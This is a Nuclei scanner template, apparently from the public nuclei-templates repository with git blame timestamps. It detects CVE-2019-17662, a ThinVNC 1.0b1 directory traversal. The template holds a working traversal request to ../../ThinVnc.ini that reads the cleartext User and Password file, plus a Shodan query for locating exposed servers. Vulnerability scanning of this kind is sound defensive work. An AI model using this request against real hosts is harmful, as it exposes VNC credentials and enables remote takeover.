nuclei-templates/http/cves/2019/CVE-2019-17662.yaml

55 lines
1.7 KiB
YAML
Raw Normal View History

2023-08-23 18:24:17 +00:00
id: CVE-2019-17662
info:
name: ThinVNC 1.0b1 - Authentication Bypass
author: DhiyaneshDK
severity: critical
description: |
ThinVNC 1.0b1 is vulnerable to arbitrary file read, which leads to a compromise of the VNC server. The vulnerability exists even when authentication is turned on during the deployment of the VNC server. The password for authentication is stored in cleartext in a file that can be read via a ../../ThinVnc.ini directory traversal attack vector.
2023-09-06 12:53:28 +00:00
remediation: |
Upgrade to a patched version of ThinVNC or implement additional authentication mechanisms.
2023-08-23 18:24:17 +00:00
reference:
- http://packetstormsecurity.com/files/154896/ThinVNC-1.0b1-Authentication-Bypass.html
- https://github.com/bewest/thinvnc/issues/5
- https://redteamzone.com/ThinVNC/
2023-08-31 11:46:18 +00:00
- https://github.com/shashankmangal2/Exploits/blob/master/ThinVNC-RemoteAccess/POC.py
2023-08-23 18:24:17 +00:00
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
2023-08-31 11:46:18 +00:00
cve-id: CVE-2019-17662
cwe-id: CWE-22
epss-score: 0.50347
epss-percentile: 0.9709
2023-09-06 12:53:28 +00:00
cpe: cpe:2.3:a:cybelsoft:thinvnc:1.0:b1:*:*:*:*:*:*
2023-08-23 18:24:17 +00:00
metadata:
verified: true
2023-09-06 12:53:28 +00:00
max-request: 1
2023-08-31 11:46:18 +00:00
vendor: cybelsoft
product: thinvnc
2023-09-06 12:53:28 +00:00
shodan-query: http.favicon.hash:-1414548363
2023-08-31 11:46:18 +00:00
tags: packetstorm,cve,cve2019,auth-bypass,thinvnc,intrusive
2023-08-23 18:24:17 +00:00
http:
- raw:
- |
GET /{{randstr}}/../../ThinVnc.ini HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- "User="
- "Password="
condition: and
- type: word
part: header
words:
- "application/binary"
- type: status
status:
- 200